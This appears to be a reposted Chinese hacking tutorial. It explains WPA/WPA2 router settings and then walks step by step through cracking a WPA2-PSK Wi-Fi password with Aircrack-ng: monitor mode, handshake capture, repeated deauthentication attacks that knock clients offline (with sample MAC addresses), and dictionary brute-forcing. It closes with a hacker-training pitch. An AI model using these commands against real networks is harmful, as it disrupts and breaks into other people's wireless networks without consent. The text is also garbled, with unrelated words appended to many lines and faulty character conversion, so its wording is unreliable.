掌控安全學院-kkkk投稿web
WPA/WPA2:算法
WPA/WPA2是一種比WEP強壯的加密算法,挑選這種安全類型,路由器將選用Radius服務器進行身份認證並獲得密鑰的WPA或WPA2安全形式。安全
由於要架起一臺專用的認證服務器,價值對比貴重且保護也很雜亂,因此不推薦不一樣用戶運用此安全類型。服務器
WPA-PSK/WPA2-PSK:微信
WPA-PSK/WPA2-PSK安全類型實際上是WPA/WPA2的一種簡化版本,它是依據同享密鑰的WPA形式,安全性很高,設置也相對簡單,適合不一樣家庭用戶和小型企業運用。app
其詳細設置:工具
認證類型:該項用來挑選體系選用的安全形式,即主動、WPA-PSK、WPA2-PSK。學習
主動:若挑選該項,路由器會依據主機懇求主動挑選WPA-PSK或WPA-PSK的安全形式。flex
加密算法:該項用來挑選對無線數據進行加密的安全算法,選項有主動、TKIP、AES。默許選項爲主動,挑選該項後,路由器將依據實踐需求主動挑選TKIP或AES加密辦法。留意11N形式不支持TKIP算法。網站
PSK暗碼:該項就是WPA-PSK/WPA2-PSK的初始密鑰了,在設置是,需求爲8-63個ASCII字符或者8-64個十六進制的字符。
組密鑰更新週期:該項設置播送和組博密鑰的定時更新,以秒爲單位,最小值爲30,若該值爲0,問表示不進行更新。
使用Aircrack-ng抓取WPA2-PSK握手包
主要步驟:
1.設置無線網卡至監聽模式 airmon-ng start wlan0
2.掃描周圍WPA2-PSK加密的無線信號 airodump-ng wlan0mon
3.新建一個終端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon
需指定信道
4.等待過程當中,發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon
設置爲發起5次攻擊
若是想要不停的發起攻擊就是這樣aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
開始操做
我使用的網卡是TL-WN722N
此時須要讓虛擬機鏈接網卡
鏈接成功後,輸入ifconfig
會看到
而後輸入airmon-ng start wlan0
成功後
開始監聽(掃描周圍的無線信號)
途中CN爲信道
airodump-ng -c 信道 --bssid xxx -w 保存路徑 wlan0mon
抓取目標的握手包
參數:—ivs -w FAN 保存ivs格式的包,名字爲test —bssid 要破解ap的ssid
強制將客戶端踢下線aireplay-ng -0 0 -a 目標的MAC地址 -c 目標客戶端MAC wlan0mon
aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
開始進行攻擊,可是有時候該命令會報錯。這是由於網卡會隨機使用信道,信道不一樣,多嘗試幾回一樣的命令直到成功就好了
如圖所示就證實抓到了握手包
開始破解密碼,執行
最後用好的字典爆破
以下的命令,成功後就能夠看到已經破解出的密碼,若是密碼複雜一點,可能須要時間
aircrack-ng -w 字典 保存的包
aircrack-ng -w 後面都是絕對路徑
學習更多黑客技能!體驗靶場實戰練習
(黑客視頻資料及工具)
往期內容回顧
本文分享自微信公衆號 - 暗網黑客(HackRead)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。